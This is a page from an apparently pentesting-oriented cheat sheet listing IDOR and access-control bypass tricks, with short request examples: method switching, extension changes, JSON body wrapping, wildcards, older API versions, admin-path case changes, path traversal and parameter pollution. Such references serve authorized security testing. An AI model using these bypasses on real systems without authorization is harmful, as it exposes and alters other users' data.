pwny.cc
  • Home
  • SO
    • AI
      • Evasion
        • Exercise 1
        • Exercise 2
        • Exercise 3
        • Exercise 4
    • Android
      • adb
      • apktool
      • burp suite
      • dns spoofing
      • frida
      • intent
      • jadx
      • JNI
      • objection
      • tcpdump
      • webview
    • iOS
      • objection
    • Linux
      • Internal Recon
      • Bypasses
      • Network
      • Exfiltration
      • Containers
      • Iptables
    • Windows
      • Internal Recon
      • External Recon
      • Bypasses
      • Network
      • Exfiltration
  • SHELLS
    • Misc
    • Web Shells
    • Reverse Shells
    • Obfuscated Shells
  • WEB ATTACKS
    • Misc
    • Command Injection
    • Cross-Site Scripting (XSS)
      • XSS Tips
      • WAF Bypasses
    • Insecure Direct Object Reference (IDOR)
    • Insecure File Upload
    • Local File Inclusion (LFI)
      • Bypass Techniques
      • LFI to RCE
    • OAuth
    • Open Redirect
      • Open Redirect to XSS
    • Server Side Request Forgery (SSRF)
    • Server Side Template Injection (SSTI)
    • SQL Injection (SQLi)
      • SQLMap
      • MySQL
      • MSSQL
      • Oracle
      • PostgreSQL
    • XML External Entity (XXE)
  • OTHER
    • Cracking
      • Hashcat
      • John the Ripper
    • Sandbox Escape
Powered by GitBook
On this page
  • Change HTTP method
  • Change file extension
  • Convert request body
  • Test wildcards
  • Check another version
  • Missing Function Level Access Control (MFLAC)
  • Path Traversal Secondary Context
  • HTTP Parameter Pollution
  • References

Was this helpful?

  1. WEB ATTACKS

Insecure Direct Object Reference (IDOR)

Change HTTP method

GET /users/delete/123 -> 403
POST /users/delete/123 -> 200

Change file extension

Try to change the extension of the endpoint that you have.

#Endpoint found
/users/password -> 401

#Endpoints to test
/users/password.json
/users/password.xml

Convert request body

Convert the body of the request to array or to include a json on it.

#Original body
{"id":1}

#Bypasses
{"id":[1]}
{"id":{"id":1}}

Test wildcards

Change the identifier of the request to a wildcard.

#Original request
/api/v1/userlist/user1

#Wildcard bypasses
/api/v1/userlist/*

Check another version

Many API endpoints expose the version in the request, try to change it to use another older.

#Original request
/api/v3/user/user3

#Changed version of the same endpoint
/api/v2/user/user3
/api/v1/user/user3

Missing Function Level Access Control (MFLAC)

GET /admin/profile -> 401
GET /ADMIN/profile -> 200

Path Traversal Secondary Context

#Original request
POST /users/delete/123 -> 403

#Bypass
POST /users/delete/MY_ID/../123 -> 200

HTTP Parameter Pollution

GET /api/v1/messages?user_id=ATACKER_ID&user_id=VICTIM_ID
GET /api/v1/messages?user_id=VICTIM_ID&user_id=ATACKER_ID

References

PreviousWAF BypassesNextInsecure File Upload

Last updated 3 years ago

Was this helpful?

Autorize
Burp Suite extension aimed at helping the penetration tester to detect authorization vulnerabilities
Logo
Auto Repeater
Burp Suite extension that automatically repeats requests, with replacement rules and response diffing
Logo